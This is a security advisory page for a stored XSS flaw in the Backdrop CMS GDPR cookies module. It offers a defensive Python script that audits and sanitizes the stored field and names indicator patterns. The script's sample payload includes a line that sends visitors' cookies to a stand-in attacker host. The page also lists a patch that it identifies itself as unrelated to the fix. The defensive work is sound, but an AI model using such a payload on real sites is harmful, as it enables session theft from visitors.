VYPR
Low severity · NVD Advisory · Published May 26, 2026

CVE-2025-71310

Description

The GDPR cookies module for Backdrop CMS (before 1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malicious value has been provided for the optional 'Info content' field for the YouTube service. This is mitigated by the fact that an attacker must have a role with the permission "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" and a site must have added a YouTube service as configuration.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The GDPR Cookies module for Backdrop CMS before 1.x-1.3.5 has a stored XSS vulnerability via the 'Info content' field for the YouTube service, requiring privileged access.

Vulnerability

The GDPR Cookies module for Backdrop CMS, versions prior to 1.x-1.3.5, does not properly sanitize the optional 'Info content' field for the YouTube service. This allows an attacker to inject arbitrary JavaScript or HTML that will be executed when the field is rendered. The vulnerability is present only if the site has configured a YouTube service and the attacker has the 'Create a GDPR Cookies Service' or 'Edit any GDPR Cookies Service' permissions [1].

Exploitation

An attacker with the required permissions can edit or create a YouTube service and supply a malicious payload in the 'Info content' field. When a visitor views a page that displays the GDPR consent dialog or related content including this field, the payload executes in the visitor's browser. No user interaction beyond viewing the page is required [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session. This can lead to data theft, session hijacking, defacement, or redirection to malicious sites. The severity is limited to Low because the attacker must have a privileged role and the site must have YouTube service configured [1].

Mitigation

Upgrade the GDPR Cookies module to version 1.x-1.3.5 or later, which contains the fix. The update is available from the module's project page [1]. No workarounds are documented. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
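The two things a site operator needs around this advisory are a way to tell whether a hostile value has already been stored in the 'Info content' field, and the rendering discipline the fixed module has to apply. The block below is an added example, not code from the GDPR Cookies module or from Backdrop: the field name, the sample values and the indicator patterns are constructed for illustration. In a Backdrop module the equivalent hardening is to pass the stored value through filter_xss() with a short tag allowlist (or check_plain() if no markup is needed) before it reaches a '#markup' render element; the Python allowlist sanitizer here reproduces that discipline so it can run stand-alone.

```python
"""Audit and sanitize an admin-editable HTML snippet such as the
'Info content' field of a GDPR Cookies YouTube service.

Added example; not code from the GDPR Cookies module or Backdrop.
SAMPLE_SAFE, SAMPLE_XSS and the indicator patterns are constructed.
"""
import re
from html import escape
from html.parser import HTMLParser

# Tags an informational consent blurb legitimately needs. Everything
# else (script, iframe, img, svg, style, ...) is dropped; any text it
# wrapped still flows through as escaped text.
ALLOWED_TAGS = {"p", "br", "a", "em", "strong", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_URL_SCHEMES = ("http:", "https:", "mailto:")

# Indicators that a stored value is a probable stored-XSS payload.
# Assumed shapes, not a list from the advisory.
_SUSPICIOUS = [
    (re.compile(r"<\s*script", re.I), "script tag"),
    (re.compile(r"<\s*(iframe|object|embed|svg)", re.I), "embedding tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "event handler attribute"),
    (re.compile(r"(javascript|vbscript|data)\s*:", re.I), "script/data URL"),
]

# Constructed samples: a benign blurb and an attacker-supplied one.
SAMPLE_SAFE = '<p>We embed <a href="https://www.youtube.com/t/terms">YouTube</a> videos.</p>'
SAMPLE_XSS = ('<p onmouseover="alert(document.cookie)">Terms</p>'
              '<script>fetch("https://attacker.example/?c="+document.cookie)</script>')


def audit_info_content(value: str) -> list:
    """Return the names of suspicious constructs found in a stored value.

    Run this over exported configuration before and after upgrading:
    the fix changes how the field is rendered and is not documented as
    rewriting values an attacker has already stored.
    """
    return [label for pattern, label in _SUSPICIOUS if pattern.search(value)]


def _safe_href(val) -> bool:
    # Browsers ignore control characters inside a scheme, so strip them
    # before matching ("java\tscript:" must not slip through).
    target = re.sub(r"[\x00-\x20]", "", (val or "").lower())
    if target.startswith(SAFE_URL_SCHEMES):
        return True
    # Relative links are fine; protocol-relative "//host" is not.
    return target.startswith(("/", "#", "?")) and not target.startswith("//")


class _AllowlistSanitizer(HTMLParser):
    """Rebuild markup keeping only allowlisted tags and attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text content is still emitted
        kept = []
        for name, val in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # this also drops every on* handler
            if name == "href" and not _safe_href(val):
                continue  # javascript:, data:, vbscript: and friends
            kept.append(f' {name}="{escape(val or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text (including the body of a dropped <script>) is re-escaped.
        self.out.append(escape(data, quote=False))


def sanitize_info_content(value: str) -> str:
    """Allowlist-filter the stored value before it is rendered."""
    parser = _AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for label, sample in (("safe", SAMPLE_SAFE), ("xss", SAMPLE_XSS)):
        print(label, "indicators:", audit_info_content(sample))
        print(label, "rendered as:", sanitize_info_content(sample))
```

The audit function is the pre-upgrade check: point it at the stored service configuration and treat any hit as a value to review by hand. The sanitizer is the rendering-side fix; note that dropping a tag keeps its text, so a stripped `<script>` body surfaces as harmless escaped text rather than disappearing silently, which is also how a reviewer can see that something was removed.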

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1: GDPR cookies module for Backdrop CMS, versions before 1.x-1.3.5

Patches

1
96171b1c9eb2 · Backdrop 1.3.5
https://github.com/backdrop/backdrop · Nate Haug · Apr 20, 2016 · Fixed in 1.3.5 via release-tag
1 file changed · +1 −1
  • core/includes/bootstrap.inc · +1 −1 · modified
    @@ -7,7 +7,7 @@
     /**
      * The current system version.
      */
    -define('BACKDROP_VERSION', '1.3.x-dev');
    +define('BACKDROP_VERSION', '1.3.5');
     
     /**
      * Core API compatibility.
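Review bot: this hunk is not the fix for the XSS the advisory describes. It only changes BACKDROP_VERSION from '1.3.x-dev' to '1.3.5' in core/includes/bootstrap.inc of the Backdrop core repository (a release tag dated Apr 20, 2016), while the advisory places the fix in version 1.x-1.3.5 of the contributed GDPR cookies module. The bundle appears to have matched the version string "1.3.5" to the wrong repository: the patch entry should point at the module commit that sanitizes the 'Info content' field before rendering, and this core version bump should be dropped from the patch list.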
    

Vulnerability mechanics

Root cause

"Stored Cross-Site Scripting (XSS) because the optional 'Info content' field for the YouTube service is not sanitized before rendering."

Attack vector

An attacker with the "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" permission stores a malicious JavaScript payload in the optional 'Info content' field of a YouTube service configuration. When a visitor loads a page that renders this field, the unsanitized payload executes in the visitor's browser. The attack requires the site to have added a YouTube service and the attacker to have the necessary administrative role.

Affected code

The advisory does not specify the exact file or function in the GDPR cookies module where the 'Info content' field is rendered without sanitization. The patch in the bundle [patch_id=2540046] only modifies core/includes/bootstrap.inc to update the version string and is unrelated to the module's code.

What the fix does

The provided patch [patch_id=2540046] only bumps the version constant from '1.3.x-dev' to '1.3.5' and contains no code change that addresses the XSS. The advisory places the fix in version 1.x-1.3.5 of the GDPR cookies module, but the patch in the bundle belongs to the Backdrop core repository, not to the module, so it does not show what the fixed module does with the 'Info content' value. No functional fix is shown in the supplied patch.

Preconditions

  • auth: Attacker must have a role with the 'Create a GDPR Cookies Service' or 'Edit any GDPR Cookies Service' permission.
  • config: Site must have a YouTube service configured.
  • input: Attacker provides a malicious JavaScript payload in the optional 'Info content' field.

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
